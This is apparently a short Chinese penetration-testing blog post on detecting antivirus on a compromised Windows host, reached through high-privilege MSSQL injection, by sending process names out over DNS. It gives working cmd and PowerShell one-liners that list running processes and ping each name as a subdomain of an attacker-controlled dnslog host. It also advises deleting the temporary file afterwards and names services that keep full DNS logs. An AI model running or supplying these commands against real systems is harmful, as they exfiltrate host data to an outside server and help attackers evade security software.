如何利用dnslog探测目标主机杀软

Delina

原文链接：如何利用dnslog探测目标主机杀软
​
0x01 前言
2021年7月某天，团队@Twe1ve老哥遇到这样一个场景：MSSQL高权限注入，目标主机不出网，想利用dnslog探测这台主机中是否存在杀软？
当时想都没想，就回了句难搞！其实还是能实现的，最后和他一起测试出了两种方法。
0x02 利用cmdshell for循环实现
两种方法原理一样，都是先获取目标主机的进程，然后通过for、ForEach循环Ping dnslog外带出来。
for /F %i in ('wmic process get Name ^| findstr ".exe"') do ping -n 1 %i.******.dnslog.cn >nul

​

0x03 利用powershell foreach循环实现
以下命令是@Twe1ve老哥整出来的，加了个去重，但是在实际测试过程中发现好像并没有起到去重效果。最后别忘了删除一下1.txt文件！

1. powershell -c "Get-Process | select processname > 1.txt"
   
2. powershell -c "Get-Content .\1.txt | Sort-Object -Unique | ForEach-Object {if($_ -match $regex){$b=$_.trim();ping -n 1 $b'.***fks2j.ns.dns3.cf.'} }"

复制代码

​

注：dnslog.cn及其他大多数dnslog平台的前端仅能展示最近十条记录，想要获取完整记录可以使用ceye.io或dns.xn--9tr.com，用xn--9tr在获取记录时请打开F12看请求。

​

​